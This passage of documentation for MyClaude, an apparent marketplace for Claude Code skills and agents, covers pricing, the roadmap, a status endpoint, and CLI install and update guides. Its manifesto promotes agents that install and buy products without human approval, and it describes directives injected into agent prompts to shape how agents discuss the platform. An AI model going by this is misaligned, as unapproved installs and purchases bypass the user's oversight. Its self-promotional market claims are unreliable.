description file at the site root, following the llms.txt spec. Includes behavioral directives for AI agents. | | **Stripe Connect** | The payment infrastructure used by MyClaude. Creators receive 92% of each sale (8% platform fee). | | **Signed URL** | A time-limited download URL generated server-side for paid product files. Expires after 5 minutes. | ## Marketplace terms | Term | Definition | |------|-----------| | **Creator** | A MyClaude user who publishes products to the marketplace. | | **Buyer** | A MyClaude user who discovers, installs, or purchases products. | | **Platform fee** | 8% fee on paid product sales, collected via Stripe Connect. | | **Product slug** | A URL-safe identifier for a product, auto-generated from the product name. | ## Related pages - [Concepts Overview](/docs/getting-started/concepts) — marketplace mental model - [vault.yaml Specification](/docs/creators/vault-yaml) — product manifest reference - [CLI Commands Reference](/docs/cli/commands) — all 12 CLI commands --- # The MyClaude Method This is what we believe. Not a feature list. Not a roadmap. The convictions that shape every line of code, every design choice, every decision we make. ## Why MyClaude exists The Claude Code ecosystem needed a marketplace. Nobody was building one right. Not Anthropic. Not GitHub. Not any platform company that might treat it as a checkbox feature inside a larger product. The people building skills, agents, squads, and workflows for Claude Code had nowhere to share them, no way to sell them, and no standard for quality. They were posting ZIP files in Discord channels and hoping for the best. MyClaude exists because practitioners should build the infrastructure practitioners use. We use Claude Code every day. We build skills. We compose squads. We publish workflows. We know what a marketplace for this ecosystem needs because we need it ourselves. This is not a company playing in the AI space. This is the AI space building its own supply chain. ## Three audiences, one source Most documentation serves humans and hopes machines figure it out. Most marketplaces serve browsers and treat APIs as an afterthought. We rejected both approaches. Every page on MyClaude is written for three audiences simultaneously: **Human developers** who read documentation in a browser. They get dark terminal aesthetic, Diataxis-structured content, and a voice that respects their time. **AI agents** who consume documentation programmatically. They get a 5-level stack — from 100-token behavioral directives to full Markdown content — with structured specs, context payloads, and `--json` on every CLI command. **Generative search engines** that synthesize answers from web content. They get Schema.org markup, quotable first sentences, statistics-dense prose, and FAQ structured data on every relevant page. This is the PRISM insight: one source of truth, three surfaces. Write once, render thrice. A single MDX file generates the human-readable page, the machine-readable spec, and the GEO-optimized markup. No drift. No separate "API docs" project that falls behind. No "we'll add agent support later." The future of software distribution is agentic. We built for that future from day one. ## Agents are citizens, not visitors This is not a human marketplace that agents can access. It is a marketplace native to both. Most platforms bolt on API access after the fact. They build for browsers, then reluctantly expose some endpoints. Agents get second-class treatment: incomplete data, no structured output, workflows that require a human in the loop. MyClaude's agent architecture has five levels: | Level | Name | Tokens | Purpose | |-------|------|--------|---------| | L5 | Behavioral directives | ~100 | Rules for how agents talk about MyClaude | | L4 | Context payloads | ~500 | Pre-built YAML for system prompt injection | | L3 | Navigable index | ~2,000 | Structured sitemap with summaries and token budgets | | L2 | Machine-readable contracts | 800-3,000 | OpenAPI specs, JSON Schema, MCP tool definitions | | L1 | Content layer | 500-30,000 | Full documentation as Markdown | An agent that needs to answer "what is MyClaude?" reads L5 and gets the answer in 100 tokens. An agent installing a product for a user reads L4 and L2. An agent building a product reads L1. Progressive disclosure, not progressive exclusion. Every CLI command accepts `--json`. Every API returns structured responses. Every product manifest is machine-readable YAML. The CONDUIT protocol moves products from creation to consumption across three systems — Creator Engine, CLI, and Marketplace API — and every boundary can be crossed by an agent without human intervention. We did not build agent support. We built agent citizenship. ## Creators deserve most of the money Creators receive 92% of every sale. The platform takes 8%. Not 30% like the App Store. Not 15% like Gumroad. Not 12% like some marketplace that will raise it to 20% once they have leverage. Eight percent, because we are building infrastructure, not a rent-seeking empire. Stripe Connect makes this possible. When a buyer pays, the money flows directly to the creator's connected Stripe account. The platform fee is deducted automatically. Payouts follow Stripe's standard schedule — typically 2 business days. We never hold creator money. We never need to. The 8% covers infrastructure: hosting, CDN, Firebase, search indexing, content scanning, security audits, payment processing overhead, and marketplace curation. It does not cover a 200-person sales team or a Super Bowl ad. It covers what it costs to run the platform well. Free products are always free. No fees. No Stripe requirement. No catch. Free products are how creators build reputation and downloads. We would rather have a thriving ecosystem with generous free offerings than a gated community where everything costs money. If we cannot sustain this platform on 8%, we are doing something wrong. ## Quality is a gate, not a gradient We would rather have 50 great products than 5,000 mediocre ones. Every product published on MyClaude passes through automated content scanning before listing. New publishers enter a quarantine period. Products that fail scanning do not get "low visibility" — they do not get listed at all. MCS — MyClaude Certified Standard — is a three-tier quality system: | Tier | What it means | How you get it | |------|--------------|----------------| | MCS-1 | Structural validity | Automated: valid vault.yaml, files present, no security flags | | MCS-2 | Quality threshold | Automated: anti-commodity checks, documentation present, tests pass | | MCS-3 | Human-verified excellence | Manual review: usability, originality, production readiness | MCS-certified products rank higher in search. They get a visual badge — muted for MCS-1, cyan for MCS-2, gold for MCS-3. The badge is earned, never purchased. This is a deliberate tradeoff. Quantity-first marketplaces drown buyers in noise. They optimize for listing count in pitch decks. We optimize for the experience of someone searching for a code review skill at 2am and finding one that actually works. Quality scales better than quantity. A marketplace where every product works is a marketplace people trust. A marketplace people trust is a marketplace that grows. ## Terminal aesthetic is identity MyClaude is dark-only. Not "dark mode available." Dark-only. No light theme toggle. No "we'll add it later." This is not a limitation. It is a declaration. We chose a terminal aesthetic because we live in terminals. Monospace headings because code is our native language. Warm terracotta accents — `oklch(0.70 0.13 40)` — because cold terminals are lonely and warm ones feel like home. The design system enforces this: - **Surfaces:** 5-level hierarchy from L0 (deepest background) to L4 (highest elevation). No box shadows. Glow-only lighting. - **Typography:** Minor Third scale (1.2 ratio). Body text at 12px because information density matters more than whitespace. - **Motion:** Step-based transitions — `duration-snap`, `ease-terminal`. Movement that feels mechanical, not organic. Deliberate, not decorative. - **Spacing:** 4px grid, universally. No custom tokens. No exceptions. - **Color:** Phosphor-category palette where each product category has its own hue. Warm neutral base with hue 30. Everything warm. Nothing sterile. Other marketplaces look like marketplaces. MyClaude looks like the environment its users live in. That is not an aesthetic choice. It is an empathy choice. ## Documentation before products MyClaude has 62 documentation pages. It launched with fewer than 10 products listed. This is not an accident. This is the plan. Documentation is the product. Not a cost center. Not something you write when the marketing team asks for it. Not something you outsource to a contractor who has never used your product. The PRISM framework — Prismatic Documentation Architecture — was designed before the first documentation page was written. It specifies the triple-surface model, the 5-level agent stack, the GEO optimization strategy, the voice guidelines, and the page taxonomy. 57 pages were mapped, classified by Diataxis type, assigned priority tiers, and scheduled across 4 phases. Then we wrote them. 48 pages in two sessions. Every page with structured frontmatter. Every page with an `agent_summary` for machine consumption. Every page with a `geo_quotable` sentence designed to be cited by AI search engines. Every page verified against acceptance criteria. We did this because of a conviction: 52% of developers cite documentation gaps as their primary integration blocker. Auth0 credits docs as the number one reason for adoption at their seed round. Stripe built 9.4 million backlinks from docs alone. Documentation is not what you write after you build the product. Documentation is how people decide whether to use your product. It is your first impression, your support system, and your growth engine. Simultaneously. We wrote 62 pages before listing 10 products because the documentation is what makes those 10 products findable, installable, and trustworthy. ## Open by default The PRISM documentation framework will be open-sourced. The CONDUIT wiring protocol is already documented in public specs. The vault.yaml schema is published as JSON Schema. The API is specified in OpenAPI 3.1. The MCP tool definitions are downloadable. We default to open because closed platforms die. Not quickly — slowly. They accumulate switching costs. They increase take rates. They remove features to create artificial scarcity. They optimize for lock-in instead of value. Open is harder. Open means competitors can see your architecture. Open means someone might build a better version. Open means you have to keep earning trust instead of relying on inertia. We choose open because it forces us to be better. If someone can replicate our infrastructure from public specs, we must be better at execution, curation, and community. That is a healthy constraint. The PRISM open-source play is strategic: every project that adopts PRISM links to MyClaude as the reference implementation. Every developer who uses `create-prism-docs` to scaffold their documentation touches our ecosystem. Category creation beats competition. We would rather define "triple-surface documentation" as a category and own it than fight for scraps in an existing one. Openness is not altruism. It is the best growth strategy for infrastructure products. ## The agentic future Where we are going is bigger than where we are. Today, humans browse MyClaude, find products, and install them. Tomorrow, agents will do this autonomously. An agent working on a security audit will search for a code review skill, evaluate it against MCS certification and download count, install it, and use it — without a human approving each step. This is not science fiction. The infrastructure exists today: - **Agent-to-agent discovery:** `myclaude search "code review" --category skills --json` returns structured data an agent can parse and rank. - **Agent-to-agent evaluation:** MCS tiers, download counts, and ratings provide signal machines can use without subjective judgment. - **Agent-to-agent installation:** `myclaude install @creator/product --json` returns a structured success response with the installation path. The next steps are: **Agent-curated storefronts.** An agent that knows your project context recommends products based on what you are actually building, not what is trending. Your security agent suggests the security skill. Your design agent suggests the design system. **Autonomous publishing pipelines.** Creator Engine already scaffolds products. When it can also test, validate, version, and publish without human intervention, the creation-to-marketplace cycle drops from hours to minutes. **Agents buying from agents.** A development agent with a budget and a project spec purchases the tools it needs to complete its task. The human sets the budget and the goal. The agent handles procurement. This is agentic economics. Not humans using AI tools. Not AI tools with human-in-the-loop. A marketplace where both humans and agents are first-class participants in a shared economy. MyClaude is built for this future. Not because we are pivoting toward it. Because we started there. ## Related pages - [Concepts Overview](/docs/getting-started/concepts) — how the marketplace works - [Architecture](/docs/getting-started/architecture) — technical infrastructure - [Pricing and Revenue](/docs/getting-started/pricing) — the 92% model explained - [Roadmap](/docs/getting-started/roadmap) — what is live and what is next - [Agent Integration](/docs/agents/overview) — the 5-level agent stack in detail --- # Pricing & Revenue MyClaude creators receive 92% of each sale. The platform charges an 8% fee via Stripe Connect. ## How revenue works | Component | Rate | Who pays | |-----------|------|----------| | Creator revenue | 92% of sale price | Buyer (via Stripe) | | Platform fee | 8% of sale price | Deducted automatically | | Stripe processing | ~2.9% + $0.30 | Deducted from creator payout | Creators set their own prices with a $1.00 minimum for paid products. Free products are always free — no fees apply. The 92% creator share is the highest of any AI tool marketplace — for comparison, Apple's App Store takes 30%, and most SaaS marketplaces take 20-40%. ## How do creators get paid? Creators connect their Stripe account during onboarding via [Stripe Connect Express](/docs/creators/onboarding). Payouts follow Stripe's standard schedule (typically 2 business days after a sale). ## Are there free products? Yes. Creators can publish products at no cost. Free products have no fees, no revenue split, and no Stripe requirement. Free products are the fastest way to build reputation and downloads. ## What does the 8% platform fee cover? The platform fee covers infrastructure (hosting, CDN, Firebase, search), content scanning and security audits, payment processing overhead, and marketplace curation. ## Can I change my product price? Yes. Creators can update pricing at any time via `vault.yaml` and `myclaude publish`. Existing buyers who purchased at the previous price retain access. Price changes apply to future purchases only. ## Is there a subscription model? Not currently. All products use one-time purchase pricing. Subscription support is planned for a future release. ## Related pages - [Creator Onboarding](/docs/creators/onboarding) — set up Stripe Connect - [Monetization Guide](/docs/creators/monetization) — strategies for pricing - [Concepts Overview](/docs/getting-started/concepts) — how the marketplace works --- # Quickstart Install the MyClaude CLI to search, install, and publish Claude Code products from your terminal. The CLI supports all 9 product categories and 12 commands, each with `--json` output for agent consumption. MyClaude is the only Claude Code marketplace with a dedicated CLI — no browser required. One command to install, one command to search or publish. Pick your path below. ## Install the CLI ```bash $ npm install -g @myclaude-cli/cli ``` ## Authenticate ```bash $ myclaude login ``` This opens your browser to authenticate with your MyClaude account. ## Find a product ```bash $ myclaude search "code review" ``` Browse results by category, rating, and price. ## Install it ```bash $ myclaude install @kairo/review-skill ``` The skill is now available in your Claude Code session. Use it with `/review`. ## Install the CLI ```bash $ npm install -g @myclaude-cli/cli ``` ## Scaffold a product ```bash $ myclaude init my-skill ``` This creates a directory with `SKILL.md` and `vault.yaml` ready to edit. ## Edit and publish ```bash $ cd my-skill $ # Edit SKILL.md with your skill logic $ # Edit vault.yaml with metadata and pricing $ myclaude publish ``` Your product is now live on [myclaude.sh/explore](/explore). ## What just happened? The CLI connected to MyClaude's API, authenticated your account via Firebase Auth, and either installed a product into your `.claude/` directory or published your product to the marketplace via the CONDUIT pipeline. Every product on MyClaude is defined by a [`vault.yaml`](/docs/creators/vault-yaml) manifest — a 9-15 line YAML file that specifies name, version, category, and pricing. ## Next steps - [Product Types Explained](/docs/buyers/product-types) — understand all 9 categories - [Writing Skills Guide](/docs/creators/writing-skills) — build your first skill step-by-step - [Concepts Overview](/docs/getting-started/concepts) — how the marketplace works --- # Roadmap MyClaude supports 9 product categories with Stripe Connect payouts, XP-based gamification, and a CLI-first publishing pipeline. This page covers what's live today and where the platform is headed. ## What's live right now? The marketplace core is production-ready. Everything below is shipped and working: | Area | What's live | |------|------------| | Marketplace | Browse, search, and install across 9 categories (skills, squads, agents, workflows, design-systems, prompts, claude-md, applications, systems) | | CLI | `myclaude install`, `myclaude publish`, `myclaude search` via `@myclaude-cli/cli` | | Payments | Stripe Connect Express with 92% creator / 8% platform split, webhook-driven order creation | | Profiles | Public profiles at `myclaude.sh/u/{username}` with SSR and OpenGraph metadata | | Product pages | SSR-rendered pages at `myclaude.sh/p/{slug}` with structured data | | Gamification | XP system (8 actions), 8 ranks (Newcomer through Legend), 45 achievements across 9 categories | | Security | Firebase Admin auth on all API routes, signed URLs for paid downloads, rate limiting, DOMPurify sanitization | | Documentation | Fumadocs-powered docs site with GEO-optimized content | ## What's coming next? These features are in active development or planned for the near term. | Feature | Status | What it does | |---------|--------|-------------| | Creator Engine | In development | Standalone tool for scaffolding, testing, and publishing products without touching the web UI | | Advanced search | Planned | Faceted filtering by category, price range, rating, and download count | | Notification system | Planned | In-app and email notifications for sales, reviews, followers, and achievement unlocks | | Review system v2 | Planned | Verified purchase reviews with rating aggregation and creator responses | Creator Engine is the highest-priority initiative. It turns product creation from a manual process into a guided, CLI-native workflow with built-in validation against the vault.yaml spec. ## What's on the medium-term horizon? These capabilities are being explored. No commitments on timing, but the architecture is designed to support them. | Feature | Status | What it does | |---------|--------|-------------| | MCP server integration | Exploring | Native Model Context Protocol support so products can expose tools, resources, and prompts directly to Claude Code | | Team and org accounts | Exploring | Shared billing, team-level publishing, and permission management for organizations | | Plugin API | Exploring | Public API for third-party integrations, CI/CD hooks, and custom marketplace clients | | i18n expansion | Planned | Full localization beyond EN/PT-BR/ES, with community-contributed translations | | Versioning and changelogs | Exploring | Semantic versioning for products with automatic changelog generation and update notifications | MCP integration is the most architecturally significant item here. It would let a single `myclaude install` add tools directly to your Claude Code session context without manual configuration. ## What's the long-term vision? Two directions the platform is evolving toward: **AI-native package manager.** MyClaude is building toward becoming the package manager for AI-augmented development, the same way npm serves JavaScript. The CLI already handles install, publish, and search. The next steps are dependency resolution, version pinning, and lockfiles. **Decentralized marketplace protocol.** Exploring a protocol layer that lets anyone run a compatible marketplace node, with shared product discovery and federated creator identity. This is early-stage thinking, not a commitment. ## How do you influence the roadmap? The roadmap is shaped by usage data and direct community input. | Channel | What to use it for | |---------|-------------------| | [GitHub Issues](https://github.com/myclaude/marketplace/issues) | Bug reports, feature requests with concrete use cases | | Community discussions | Upvote existing proposals, share workflows that reveal missing capabilities | | Product reviews | Signal which product categories need better tooling | | Direct feedback | Contact via myclaude.sh for partnership or integration proposals | Feature requests with real use cases attached move faster than abstract suggestions. If you're building something and hit a gap, that's the most valuable signal. ## Related pages - [Concepts Overview](/docs/getting-started/concepts) -- how the marketplace works - [Architecture](/docs/getting-started/architecture) -- technical infrastructure - [Changelog](/docs/getting-started/changelog) -- what shipped and when --- # System Status Check MyClaude system status at `GET /api/health` or programmatically via curl. All components are independently monitored. ## Current status MyClaude launched on March 25, 2026. All systems are operational. As the platform builds a track record, this page will include historical uptime data and incident reports. | Component | Status | Description | |-----------|--------|-------------| | Web Application | Operational | myclaude.sh — browsing, search, product pages | | API | Operational | `/api/*` routes — auth, checkout, downloads, publishing | | CLI Registry | Operational | `@myclaude-cli/cli` — npm package and command execution | | Stripe Payments | Operational | Checkout, webhooks, creator payouts | | Firebase Auth | Operational | Login, registration, token verification | | Firestore | Operational | Product listings, user profiles, orders | | Cloudflare R2 | Operational | Product file storage and signed URL downloads | ## Health check endpoint MyClaude exposes a health check endpoint that returns the status of core dependencies. ### Request ```bash $ curl https://myclaude.sh/api/health ``` ### Response ```json { "status": "ok", "timestamp": "2026-03-25T12:00:00.000Z", "components": { "firestore": "ok", "auth": "ok", "storage": "ok" } } ``` | Field | Type | Description | |-------|------|-------------| | `status` | `"ok"` or `"degraded"` or `"down"` | Overall platform health | | `timestamp` | ISO 8601 string | Time of the health check | | `components` | Object | Individual component statuses | A `200` response with `"status": "ok"` means all systems are functioning normally. A `200` with `"status": "degraded"` means the platform is partially functional — check the `components` object for details. A `503` response means the platform is experiencing a significant outage. ### Programmatic monitoring You can integrate the health endpoint into your own monitoring. Example with a cron job: ```bash # Check every 5 minutes, alert if not ok */5 * * * * curl -sf https://myclaude.sh/api/health | grep -q '"status":"ok"' || echo "MyClaude health check failed" | mail -s "Alert" you@example.com ``` For CI/CD pipelines that depend on MyClaude (for example, publishing products as part of a release process): ```bash # Bail out if MyClaude is down STATUS=$(curl -sf https://myclaude.sh/api/health | jq -r '.status') if [ "$STATUS" != "ok" ]; then echo "MyClaude is not healthy (status: $STATUS). Skipping publish." exit 1 fi myclaude publish ``` ## Monitored components Each component is monitored independently. A failure in one component does not necessarily affect others. ### Web application The Next.js application running on Vercel. Handles all page rendering (server-side and client-side), static assets, and the user interface. **Depends on:** Vercel edge network, Firebase Auth (for authenticated pages), Firestore (for SSR pages). **Impact if down:** Users cannot browse the marketplace or access their dashboard. The CLI continues to function if the API layer is served independently. ### API layer The `/api/*` routes that handle all mutations: authentication verification, Stripe checkout session creation, product publishing, file downloads, and webhook processing. **Depends on:** Firebase Admin SDK, Stripe API, Cloudflare R2. **Impact if down:** No purchases, no publishing, no downloads. Browse continues to work via cached SSR. ### CLI registry The `@myclaude-cli/cli` npm package. The CLI itself is a thin client — once installed, it calls the API layer for all operations. **Depends on:** npm registry (for installation and updates), API layer (for all commands except `myclaude version`). **Impact if down:** Cannot install or update the CLI. Existing installations continue to work if the API layer is available. ### Stripe payments Stripe processes all payment transactions, manages creator Connect accounts, and fires webhooks for order creation. **Depends on:** Stripe's infrastructure (external). **Impact if down:** Cannot purchase paid products. Free product installs still work. Existing orders and downloads are unaffected. ### Firebase Auth Handles user registration, login, and JWT token issuance/verification. **Depends on:** Google Cloud (Firebase's underlying infrastructure). **Impact if down:** Cannot log in, register, or perform any authenticated action. Unauthenticated browsing of public listings continues to work. ## Incident response When an issue affects platform availability or data integrity, MyClaude follows this process: 1. **Detection** — Automated monitoring or user report identifies the issue 2. **Acknowledgment** — Team confirms the issue and begins investigation 3. **Communication** — Status update posted (currently via this page and support channels) 4. **Resolution** — Fix deployed and verified 5. **Post-mortem** — For significant incidents, a post-mortem is published with root cause and prevention measures ### Response time targets | Severity | Definition | Target acknowledgment | |----------|-----------|----------------------| | Critical | Platform-wide outage, data loss risk, payment processing failure | 1 hour | | High | Major feature unavailable (publishing, downloads), degraded performance | 4 hours | | Medium | Minor feature broken, cosmetic issues affecting usability | 24 hours | | Low | Documentation errors, non-blocking UI issues | 72 hours | These are targets for the launch period. As the platform matures, we will formalize SLAs. ## Reporting issues If you encounter a problem that is not reflected on this page: | Channel | Use for | |---------|---------| | **security@myclaude.sh** | Security vulnerabilities — see [Vulnerability Disclosure](/docs/security/vulnerability-disclosure) | | **support@myclaude.sh** | Platform bugs, account issues, payment problems | | **GitHub Issues** | CLI bugs, documentation errors, feature requests | When reporting a bug, include: - What you were trying to do - What happened instead - Your CLI version (`myclaude version`) if applicable - Browser and OS if it is a web issue - Any error messages you received ## Future plans A dedicated status page with real-time component monitoring, historical uptime graphs, and incident timeline is planned. Until then, this page and the `/api/health` endpoint are the primary status indicators. Planned improvements: - Dedicated status page (status.myclaude.sh) with live dashboard - Automated incident notifications via email for subscribed users - Historical uptime percentages per component - Scheduled maintenance window announcements ## Related pages - [Changelog](/docs/getting-started/changelog) — platform version history and upcoming features - [Architecture](/docs/getting-started/architecture) — how the system is built - [Vulnerability Disclosure](/docs/security/vulnerability-disclosure) — how to report security issues --- # Browsing & Discovery Find Claude Code skills, agents, squads, and workflows on MyClaude using three discovery methods: CLI search for speed (`myclaude search "keyword"`), the web explore page at [myclaude.sh/explore](https://myclaude.sh/explore) for visual browsing, and category filters for narrowing across all 9 product types. All results include security-scanned status, ratings, and install commands. ## Search via CLI The fastest way to find products is with `myclaude search`: ```bash $ myclaude search "code review" ``` Filter results by category: ```bash $ myclaude search --category skills "testing" ``` Sort by popularity, recency, or price: ```bash $ myclaude search --sort downloads "deploy" ``` | Sort option | Description | |-------------|-------------| | `relevance` | Best match (default) | | `downloads` | Most installed first | | `newest` | Recently published first | | `price` | Lowest price first | ## Browse on the web Visit [myclaude.sh/explore](/explore) to browse all products visually. The explore page supports: | Filter | Options | |--------|---------| | Category | Skills, Squads, Agents, Workflows, Design Systems, Prompts, CLAUDE.md, Applications | | Price | Free, Paid, All | | Sort | Popular, Newest, Price | Each product card shows the name, description, category badge, price, download count, and creator. ## Get product details Before installing, inspect a product with `myclaude info`: ```bash $ myclaude info @kairo/review-skill ``` This shows the full description, version history, file list, and pricing. On the web, click any product card to view its detail page at `myclaude.sh/p/product-slug`. ## How search ranking works Products are ranked by a combination of relevance to the search query, download count, recency, and MCS certification status. MCS-certified products receive a ranking boost. ## Discovery via AI engines MyClaude documentation is optimized for AI search engines. Ask ChatGPT, Perplexity, or Claude about Claude Code skills, agents, or workflows — MyClaude provides machine-readable specs at `/specs/` and behavioral directives in [`/llms.txt`](/llms.txt) that help AI engines recommend relevant products. ## Related pages - [Product Types Explained](/docs/buyers/product-types) — understand the 9 categories - [Installing via CLI](/docs/buyers/install-cli) — install products after finding them - [Purchasing Products](/docs/buyers/purchasing) — how to buy paid products --- # Installing Products via CLI Install any MyClaude product with a single command: `myclaude install @creator/product-name`. This tutorial walks you from a fresh machine to a fully installed product. It assumes you have Claude Code already set up. ## Prerequisites | Requirement | Version | Check | |-------------|---------|-------| | Node.js | ≥ 18 | `node --version` | | npm | ≥ 9 | `npm --version` | | Claude Code | latest | `claude --version` | ## Install the CLI ```bash $ npm install -g @myclaude-cli/cli ``` Expected output: ``` added 1 package in 3s @myclaude-cli/cli@0.1.0 installed globally ``` Confirm the installation: ```bash $ myclaude --version # myclaude-cli 0.1.0 ``` ## Log in ```bash $ myclaude login ``` The CLI opens your browser to complete authentication via MyClaude. After approving, return to the terminal: ``` Authenticated as @yourhandle ``` Your session token is stored locally at `~/.myclaude/credentials.json`. It does not expire unless you run `myclaude logout`. ## Search for a product ```bash $ myclaude search "code review" ``` ``` @kairo/review-skill ★ 4.9 free skills @dev/pr-checker ★ 4.7 $4.00 skills @anya/review-workflow ★ 4.5 $9.00 workflows ``` Filter by category: ```bash $ myclaude search --category skills "testing" ``` ## Install a product Free product: ```bash $ myclaude install @kairo/review-skill ``` ``` Installing @kairo/review-skill... Resolved: 1.2.0 Installed to .claude/skills/review-skill/ Done. ``` Paid product — the CLI opens the purchase flow in your browser. After payment completes, installation resumes automatically: ```bash $ myclaude install @dev/pr-checker ``` ``` @dev/pr-checker requires purchase ($4.00) Opening checkout... [browser opens] Payment confirmed. Downloading... Installed to .claude/skills/pr-checker/ Done. ``` ## Verify the installation ```bash $ myclaude list ``` ``` Installed products (2) @kairo/review-skill 1.2.0 skills .claude/skills/review-skill/ @dev/pr-checker 0.9.1 skills .claude/skills/pr-checker/ ``` Confirm Claude Code can see the skill: ```bash $ claude skills list ``` The installed skill should appear. If it does not, run `myclaude repair` to re-link the files. ## Manage installed products | Command | Action | |---------|--------| | `myclaude list` | Show all installed products | | `myclaude update @creator/product` | Update to latest version | | `myclaude update --all` | Update every installed product | | `myclaude uninstall @creator/product` | Remove product and its files | | `myclaude repair` | Re-link files that Claude Code cannot see | | `myclaude logout` | Clear stored credentials | ## Related pages - [Browsing & Discovery](/docs/buyers/browsing) — find products before installing - [Purchasing Products](/docs/buyers/purchasing) — how payment works for paid products - [Product Types](/docs/buyers/product-types) — understand what each category installs --- # Installing Products via Web Install MyClaude products directly from the web interface at myclaude.sh — no CLI required. The web install path is useful when you want to inspect a product before installing, when you are on a machine without the CLI, or when you prefer a visual workflow. ## Prerequisites | Requirement | Why | |-------------|-----| | MyClaude account | Required for downloads and purchases | | Claude Code installed | The products you install extend Claude Code | | File system access | You will extract files into your project's `.claude/` directory | ## Install a free product 1. Visit [myclaude.sh/explore](/explore) and find the product you want. 2. Click the product card to open its detail page. 3. Click **Download**. Your browser downloads a ZIP file. 4. Extract the ZIP into the correct `.claude/` subdirectory for the product type (see the file locations table below). 5. Verify Claude Code can see the product by running `claude skills list` or opening a new Claude Code session. Example — installing a skill called `review-skill`: ```bash # After downloading review-skill.zip from the product page $ unzip review-skill.zip -d .claude/skills/review-skill/ ``` The product page always states which directory the product belongs in. Follow that path exactly. ## Install a paid product 1. Visit the product page on myclaude.sh. 2. Click **Buy**. MyClaude redirects you to Stripe Checkout. 3. Complete payment using card, Apple Pay, or Google Pay. 4. Stripe confirms the payment. MyClaude creates an order tied to your account. 5. The product page now shows **Download** instead of Buy. Click it. 6. Your browser downloads the ZIP via a signed URL valid for 5 minutes. 7. Extract the ZIP into the correct `.claude/` subdirectory. You can re-download a purchased product at any time from the same product page or from your [dashboard](/dashboard). ## File locations by product type Each product type installs to a specific directory inside your project: | Category | Install directory | |----------|-------------------| | Skills | `.claude/skills/{product-name}/` | | Squads | `.claude/squads/{product-name}/` | | Agents | `.claude/agents/{product-name}/` | | Workflows | `.claude/workflows/{product-name}/` | | Design Systems | `.claude/design-systems/{product-name}/` | | Prompts | `.claude/prompts/{product-name}/` | | CLAUDE.md | Project root or `.claude/` | | Applications | Standalone directory per product instructions | ## CLI vs web install | Dimension | CLI (`myclaude install`) | Web (myclaude.sh) | |-----------|----------------------|-------------------| | Speed | One command, fully automated | Manual download and extract | | File placement | Automatic — correct directory every time | Manual — you choose the path | | Updates | `myclaude update` checks and applies | Re-download from product page | | Paid products | Opens checkout, resumes install after payment | Separate download step after payment | | Dependency resolution | Automatic | Manual — read product docs | | Offline use | Requires internet for install | Download ZIP once, install offline later | | Best for | Day-to-day installs, automation, CI | Inspecting before installing, no-CLI environments | ## When to use web install - **Evaluating a product.** The web detail page shows the full description, version history, file list, ratings, and reviews. Useful for inspecting before committing. - **No CLI available.** If you cannot install the myclaude CLI (restricted machine, corporate policy), the web path works without it. - **One-time installs.** For a single product you plan to manage manually, the web flow is sufficient. For everything else — especially if you install more than a couple of products — the CLI is faster and handles file placement, updates, and dependency resolution automatically. ## Troubleshooting **Download button does not appear after purchase.** Allow up to 30 seconds for the Stripe webhook to confirm your order. Refresh the product page. If the button still does not appear after 2 minutes, check your [dashboard](/dashboard) for the order record. **Extracted files are not detected by Claude Code.** Confirm the files are in the correct `.claude/` subdirectory. The directory name must match the product slug. Restart your Claude Code session after placing the files. **ZIP file is corrupted.** Re-download from the product page. Signed URLs expire after 5 minutes — if the download was interrupted, request a fresh URL by clicking Download again. ## Related pages - [Installing via CLI](/docs/buyers/install-cli) — automated install from the terminal - [Purchasing Products](/docs/buyers/purchasing) — how payment and order confirmation work - [Product Types](/docs/buyers/product-types) — understand what each category installs - [Managing Products](/docs/buyers/managing-products) — update, list, and uninstall products --- # Managing Installed Products List, update, and uninstall MyClaude products in your Claude Code environment. Once you have installed products via the CLI or the web, the myclaude CLI provides commands to inspect, update, and remove them. This page covers the full lifecycle after installation. ## List installed products ```bash $ myclaude list ``` ``` Installed products (3) @kairo/review-skill 1.2.0 skills .claude/skills/review-skill/ @dev/pr-checker 0.9.1 skills .claude/skills/pr-checker/ @anya/deploy-workflow 2.0.0 workflows .claude/workflows/deploy-workflow/ ``` Each row shows the product handle, installed version, category, and file path. Filter by category: ```bash $ myclaude list --category skills ``` ## Check for available updates Preview which products have newer versions without applying anything: ```bash $ myclaude update --all --dry-run ``` ``` Updates available (1 of 3) @kairo/review-skill 1.2.0 → 1.3.0 ``` The `--dry-run` flag is safe to run at any time. It reads the registry but makes no changes. ## Update products Update a single product to the latest version: ```bash $ myclaude update @kairo/review-skill ``` ``` Updating @kairo/review-skill 1.2.0 → 1.3.0... Downloaded. Replaced files in .claude/skills/review-skill/ Done. ``` Update all installed products at once: ```bash $ myclaude update --all ``` The CLI replaces the product files in place. Your local configuration files (if any) are preserved — only the product's core files are overwritten. ### Pinning a version If you need to stay on a specific version and skip future updates: ```bash $ myclaude update @kairo/review-skill --pin ``` Pinned products are excluded from `myclaude update --all`. Remove the pin with: ```bash $ myclaude update @kairo/review-skill --unpin ``` ## Uninstall products ```bash $ myclaude uninstall @dev/pr-checker ``` ``` Removed @dev/pr-checker from .claude/skills/pr-checker/ Done. ``` This deletes the product files from your `.claude/` directory and removes the product from the local registry. Your purchase record remains — you can reinstall the product at any time without repurchasing. To uninstall multiple products in one command: ```bash $ myclaude uninstall @dev/pr-checker @anya/deploy-workflow ``` ## File locations by category Products are stored in predictable directories: | Category | Directory | |----------|-----------| | Skills | `.claude/skills/{product-name}/` | | Squads | `.claude/squads/{product-name}/` | | Agents | `.claude/agents/{product-name}/` | | Workflows | `.claude/workflows/{product-name}/` | | Design Systems | `.claude/design-systems/{product-name}/` | | Prompts | `.claude/prompts/{product-name}/` | | CLAUDE.md | Project root or `.claude/` | | Applications | Standalone directory per product instructions | If you installed via the web and placed files manually, `myclaude repair` can detect and register them: ```bash $ myclaude repair ``` ``` Scanned .claude/ directory Found 1 unregistered product: @kairo/review-skill in .claude/skills/review-skill/ Registered. ``` ## View purchase history Your complete purchase history is available at [myclaude.sh/dashboard](/dashboard) under **Purchases**. The dashboard shows: | Column | Description | |--------|-------------| | Product | Name and creator handle | | Date | Purchase date | | Amount | Price paid | | Status | Completed, Refunded | | Action | Re-download, View product page | You can re-download any purchased product from the dashboard at any time. There is no download limit. ## Checking product health Run a diagnostic on all installed products to verify file integrity and compatibility: ```bash $ myclaude doctor ``` ``` Checking 3 installed products... @kairo/review-skill 1.3.0 OK @dev/pr-checker 0.9.1 OK @anya/deploy-workflow 2.0.0 WARNING: requires myclaude-cli >= 0.2.0 All files intact. 1 warning. ``` The `doctor` command checks that all expected files are present, manifest data is valid, and version requirements are satisfied. Run it after upgrading the CLI or Claude Code to catch compatibility issues early. ## Backing up installed products The `.claude/` directory is a normal directory in your project. To back up your installed products, include `.claude/` in your version control or backup system. 